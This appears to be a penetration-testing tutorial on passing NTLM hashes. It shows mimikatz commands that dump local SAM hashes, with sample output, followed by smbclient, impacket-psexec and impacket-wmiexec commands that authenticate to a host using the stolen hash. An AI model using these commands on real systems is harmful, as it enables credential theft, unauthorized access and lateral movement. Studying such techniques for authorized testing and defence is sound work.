
Passing NTLM hash

Once you have a user's NTLM (NT) hash and cracking it is not feasible, for example because the password is long or complex, you can authenticate with the hash itself instead of the cleartext password to access resources on Windows hosts. This works because NTLM authentication uses the NT hash directly as the keying material: whoever holds the hash can produce a valid challenge response, so the hash is as good as the password.


Conditions

  1. To dump hashes from the local SAM with mimikatz you need a compromised account with local Administrator or SYSTEM privileges on that host.
  2. Hashes from the local SAM belong to local accounts; they can be passed to other hosts only where the same local account name and password are reused.

Get the Hash

Use mimikatz to extract the hash from the system (privilege::debug grants SeDebugPrivilege, token::elevate impersonates SYSTEM, lsadump::sam reads the SAM hive):

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::elevate
...

mimikatz # lsadump::sam
...
RID : 000001f4 (500)
User : Pawan
Hash NTLM: BA65AB46C8E2A05C51A6312C93726ACB

Tools to pass the hash

Different tools fit different use cases:

  1. smbclient (file shares only; no code execution)
  2. CrackMapExec (spraying one hash across many hosts)
  3. impacket-psexec (drops a service binary on the target; noisy but gives a SYSTEM shell)
  4. impacket-wmiexec (runs commands over WMI/DCOM; no binary dropped)

Passing Hash using smbclient

smbclient takes the password as the positional argument after the share name; with --pw-nt-hash that value is interpreted as the NT hash rather than a cleartext password:

smbclient \\\\192.168.1.1\\secrets -U Pawan --pw-nt-hash BA65AB46C8E2A05C51A6312C93726ACB

Passing Hash using impacket-psexec

The -hashes argument takes LMHASH:NTHASH. The LM half is not used by NTLM authentication, so it can be left as 32 zeros. psexec needs a writable share (normally ADMIN$) and service-control rights, i.e. local admin on the target:

impacket-psexec -hashes 00000000000000000000000000000000:BA65AB46C8E2A05C51A6312C93726ACB Pawan@192.168.1.1

Passing Hash using impacket-wmiexec

Same -hashes format; wmiexec also needs local admin on the target but does not drop a binary, so it leaves less on disk:

impacket-wmiexec -hashes 00000000000000000000000000000000:BA65AB46C8E2A05C51A6312C93726ACB Pawan@192.168.1.1